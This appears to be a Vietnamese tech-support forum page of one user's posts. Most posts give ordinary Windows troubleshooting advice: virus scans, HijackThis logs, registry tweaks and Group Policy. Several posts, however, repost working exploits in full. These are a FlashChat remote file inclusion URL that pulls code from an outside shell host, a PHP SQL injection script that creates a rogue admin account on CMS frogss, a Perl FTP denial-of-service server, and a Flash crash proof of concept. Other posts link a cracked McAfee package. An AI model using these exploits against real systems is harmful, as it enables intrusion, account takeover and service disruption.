Messages posted by: LeonHart

Khi setup mà thông báo "Cannot copy" thì nên xem lại đĩa CD và đầu đọc đĩa CD
Thân

Dùng SIW
http://www.gtopala.com/en/siw.exe

Dùng Mcafee Enterprise với bản cập nhật SDAT (http://download.nai.com/products/licensed/superdat/english/intel/sdat4838.exe)

Link: http://rapidshare.de/files/28306430/VSE80iLEN.rar (include patch 13)
Thân

Thì biết là access deny, nhưng bạn ghi đầy đủ cái thông báo lỗi đi

Xem thêm:
http://www.symantec.com/security_response/writeup.jsp?docid=2005-022409-2131-99&tabid=3
http://www.hauri.net/virus/virusinfo_read.php?code=WOW3000913

Thử dùng Counter Spy quét xem sao.

Vào Event Viewer post thông báo kèm ID lên thử
Dùng HijackThis quét và post nội dung Logfile của nó.

Quét virus. Không vào registry cũng có nhiều lý do, và tốt nhất bạn post thông báo lỗi khi truy cập vào registry lên đây để mình xem thử.
Thân

Dùng Mcafee Enterprise với bản cập nhật SDAT (http://download.nai.com/products/licensed/superdat/english/intel/sdat4838.exe) mới nhất quét thử.

Link: http://rapidshare.de/files/28306430/VSE80iLEN.rar (kèm patch 13)

Nếu có virus thì ghi rõ lên đây và vui lòng kèm theo thông báo lỗi khi bạn truy cập vô mạng LAN.
Thân

Rated as : High Risk
Code:

#==============================================
#ZZ:FlashChat <= V3.1 (adminlog) Remote File Inclusion Exploit
#==============================================
#
#Critical Level : Dangerous
#
#Venedor site : http://download.zehnet.de
#
#Version : V3.1
#
#
#==============================================
#
#Bug in : chat/inc/func.add_data.php
#
#Vlu Code :
#--------------------------------
#
# if($cfg['autolink']==1){
# include($adminlog.'./inc/func.autolink.php');
# }
#
#==============================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/chat/inc/func.add_data.php?cfg[autolink]=1&adminlog=http://SHELLURL.COM?
#
#
#==============================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)
===============================================

Code:

<?php
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
echo "+rn";
echo "- - - [DEVIL TEAM THE BEST POLISH TEAM] - -rnrn";
echo "+rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+rnrn";
echo "- CMS frogss <= 0.4 (podpis) SQL Injection Exploit [creat
new admin]"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "- [Script name: CMS frogss v.0.4"rn";
echo "- [Script site:
 http://frogss.be/download.php?id=1"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "- Find by: Kacper (a.k.a Rahim)"rn";
echo "+"rn";
echo "- Contact: <a href="mailto:kacper1964@yahoo.pl">kacper1964@yahoo.pl</a>"rn";
echo "- or"rn";
echo "-  http://www.rahim.webd.pl/"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "- Special Greetz: DragonHeart ;-)"rn";
echo "- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus
;]"rn";
echo "+"rn";
echo "!@ Przyjazni nie da sie zamienic na marne korzysci
@!"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "- Z Dedykacja dla osoby,"rn";
echo "- bez ktorej nie mogl bym zyc..."rn";
echo "- K.C:* J.M (a.k.a Magaja)"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "Usage: www.site.com /path/ UserName Password proxy
"rn";
echo "ex: www.site.com <= site host "rn";
echo "ex: /path/ <= script path "rn";
echo "ex: Username <= exploit username "rn";
echo "ex: Password <= exploit password "rn";
echo "ex: proxy <= optional ;-) "rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "EX: www.site.com /frogss/ Evil hacker 127.0.0.1
"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
/*
vulnerable code => module/rejestracja.php line 56-87:
....
function ok()
{
global
$login,$haslo,$email,$miasto,$www,$gg,$tlen,$poziom,$podpis,$last_log,$logowan,$komentarzy,$odwiedzin,$ip,$lan;
$query=mysql_query("SELECT login FROM uzytkownicy WHERE
login='".$login."'");
if (!$login) {
echo 'Nie poda³e¶ Loginu';
} elseif (!$haslo){
echo 'Nie poda³e¶ has³a';
} elseif (!$email)
{
echo 'Nie poda³e¶ e-maila';
} elseif(mysql_num_rows($query)==0)
{
if($www=='http://') $www = '';
if($gg=='gg:') $gg = '';
if($tlen=='tlen:') $tlen = '';
$haslomd5 = md5($haslo);
$ip = $_SERVER['REMOTE_ADDR'];
$query1 = "INSERT INTO uzytkownicy VALUES(NOT NULL, '$login',
'$haslomd5', '$email', '$miasto', '$www', '$gg', '$tlen', '$poziom',
'$podpis', NOW(), '$last_log', '$logowan', '$komentarzy', '$odwiedzin',
'offline', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '',
'', '0', '0', '0', '$ip')";
$result = mysql_query ($query1);
if($result)
{
echo '<br>'.$lan['registration_add'].'<br>';
}
else
{
echo
'<br>'.$lan['registration_add_error'].'<br><br>';
}
}
else
{
....
when we register to new user in $podpis we can insert in SQL injection
;-)
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
ob_implicit_flush (1);
function show($headeri)
{
$ii=0;$ji=0;$ki=0;$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1){
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++) {
echo
"<td>".htmlentities($headeri[$li+$ki])."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {
echo
"<td>0".htmlentities($datai)."</td>";
}
else {
echo "<td>".htmlentities($datai)."</td>
";
}
$ii++;$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
echo "<td> </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++) {
echo
"<td>".htmlentities($headeri[$li])."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacket()
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " .
socket_strerror($socket) . "<br>";
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port
".$port."...<br>";
if ($proxy=='') {
$result = socket_connect($socket, $host, $port);
}
else {
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.rnReason: (".$result.")
" . socket_strerror($result) . "<br><br>";
}
else {
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function refresh()
{
flush();
ob_flush();
usleep(5000000000);
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.htmlentities($host); die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid prozy...';die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);echo nl2br(htmlentities($html));
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$_POST[host];$port=$_POST[port];$path=$_POST[path];
$USER=$_POST[USER];$PASS=$_POST[PASS];$proxy=$_POST[proxy];
echo "<span class="Stile5">";
if (($host<>'') and ($path<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{die('Error... check the path!');}
if ($proxy=='') {$p=$path;} else
{$p='http://'.$host.':'.$port.$path;}
}
if (($host<>'') and ($path<>'') and ($USER<>'') and
($PASS<>''))
{
$sql="') INSERT INTO uzytkownicy VALUES(1, Kacper,
b98092e78aa47e68ae2ba617137960a4, <a href="mailto:devilteam@hackers.pl">devilteam@hackers.pl</a>, NULL,
 http://www.rahim.webd.pl/, NULL, NULL, 0, DEVILTEAM, NOW(), 99999, 99999,
99999, 9999, offline, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0,
4)/*";
$data='-----------------------------7d62702f250530
Content-Disposition: form-data; name="login";
'.$USER.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="haslo";
'.$PASS.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="email";
<a href="mailto:devilteam@polish-hackers.pl">devilteam@polish-hackers.pl</a>
-----------------------------7d62702f250530
Content-Disposition: form-data; name="miasto";
localhost
-----------------------------7d62702f250530
Content-Disposition: form-data; name="www";
 http://www.rahim.webd.pl/
-----------------------------7d62702f250530
Content-Disposition: form-data; name="gg";
000000
-----------------------------7d62702f250530
Content-Disposition: form-data; name="tlen";
h20
-----------------------------7d62702f250530--
Content-Disposition: form-data; name="podpis";
'.$sql.'
-----------------------------7d62702f250530--
';
$packet ="POST ".$p."login.php HTTP/1.1rn";
$packet.="User-Agent: Googlebot/2.1rn";
$packet.="Host: ".$host."rn";
$packet.="Accept: text/plainrn";
$packet.="Referer:
 http://".$host.$path."index.php?lang=enrn";
$packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d62702f250530rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.=$data;
$packet.="Connection: Closern";
show($packet);
sendpacketii($packet);
if (!eregi("Location:",$html)) {die("Failed to
login...");}
$temp=explode("Set-Cookie: ",$html);
$COOKIE='';
for ($i=1; $i<=6; $i++)
{
$temp2=explode(" ",$temp[$i]);
$COOKIE.=" ".$temp2[0];
}
if (eregi("The user has successfully been added",$html))
{
echo "exploit succeeded... now login as adminn";
echo "with username "Kacper"" and password
"devilteam""n";
echo ".$host."/Administracja/index.php"n";
echo "Greetz ;-)"n";
}
?>

securitydot.net - 2006-08-27

Theo kinh nghiệm thì bên EE đa số là update fix từ microsoft sẽ hết. Để antonixic thử xem sao.

Rated as : Critical

#!/usr/bin/perl
#author: tomas kempinsky

use strict;
use Socket;

my $port = shift || 2121;
my $proto = getprotobyname('tcp');
my $payload =
"x32x32x30x20x5ax0dx0ax33".
"x33x31x20x5ax0dx0ax35x30".
"x30x20x44x6fx53x0dx0ax35".
"x30x30x20x5ax0dx0a";

socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:
$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock:
$!";

my $paddr = sockaddr_in($port, INADDR_ANY);

bind(SERVER, $paddr) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
print "ftp://D:oS@x0localhost:2121/n";

my $client_addr;
while ($client_addr = accept(CLIENT, SERVER)) {
# find out who connected
my ($client_port, $client_ip) = sockaddr_in($client_addr);
my $client_ipnum = inet_ntoa($client_ip);
my $client_host = gethostbyaddr($client_ip, AF_INET);
print ": $client_host", "[$client_ipnum]n";
# send them a message, close connection
print CLIENT $payload;
close CLIENT;
}

Rated as : Critical

/*
*
* Macromedia flash crash
* Bug discovered by Mr.Niega
* http://www.swerat.com/
*
* Affected Software: Flash 9 (Ie Plugin)
* Impact: Crash
* Solution Status: Unpatched
*
* E-Mail: MarjinZ@gmail.com
* Credits goes out to MarjinZ
*
*
* /| //| | /| //| |
* //| // | | __ //| // | |
* // | // | | // ) ) // | // | |
* // | // | | // / / // | // | |
*// |// | | // / / // |// | |
*
*
*/

<object classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"
id="allo">
</object>
<script>
var A = 'A';
while (A.length <= 51512*512) A+=A;
allo.AllowScriptAccess = A;
</script>
securitydot.net - 2006-08-18

mún dis chuột phải í ( chi? de? mỗi refresh)

Enable/Disable cho Current User
Code:

Registry Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Data Type: DWORD
Value Name: NoViewContextMenu
Value Data: [0 = Disabled / 1 = Enabled]
Tắt Registry và Reboot

Enable/Disable cho Local Machine
Code:

Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
Data Type: DWORD
Value Name: NoViewContextMenu
Value Data: [0 = Disabled / 1 = Enabled]
Tắt Registry và Reboot

Nếu bạn chỉ muốn disable một vài chức năng khi right-click menu, thì dùng ShellMenuView http://www.nirsoft.net/utils/shell_menu_view.html) hay ShellExView http://www.nirsoft.net/utils/shexview.html). Ngoài ra, bạn có thể chỉnh nó thông qua registry, xem hướng dẫn: http://www.jfitz.com/tips/rclick_custom.html

NOTE: Backup registry trước khi làm.

Bạn vui lòng check event viewer và post nó ra đây. Ngoài ra post Logfile của HijackThis v1.99.0.

- Bạn có sử dụng Mcafee hay NAV không?

Thử:

1. Update hết hotfix từ microsft.

2. Scan spyware, quét lại virus kỹ.

3. Check:
http://support.microsoft.com/default.aspx?scid=kb;en-us;821690
(xem sơ : http://support.microsoft.com/?kbid=894391)

Try and reply
Thân

Nếu bạn là người biết nhiều về window, chỉnh sửa regedit thì áp dụng cách trên. Còn không thì nên dùng phần mềm riêng để tránh trục trặc cho win.
Thân

Do Windows Update bị block qua GPO. Bạn phải xem cái GPOs nào kèm theo OU hay Domain đã đc xử lý ở server.

Dùng "gpresult" sẽ cho bạn thấy những policies nào ảnh hưởng tới server. Từ đó có thể eable policies nào đã set "Disable and remove links to Windows Update".

Thân

1. Đặt câu hỏi chẳng nêu rõ Hệ Điều Hành đang dùng là gì
2. Đã kiểm tra virus chưa? Xem EventViewer có thông báo gì không?
3. Xem thử Folder Options có bị mất không? Trong vài folder có những file kèm extension .exe không?